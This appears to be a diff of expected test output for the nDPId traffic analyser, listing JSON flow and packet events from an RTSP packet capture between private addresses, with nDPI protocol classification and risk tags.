-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 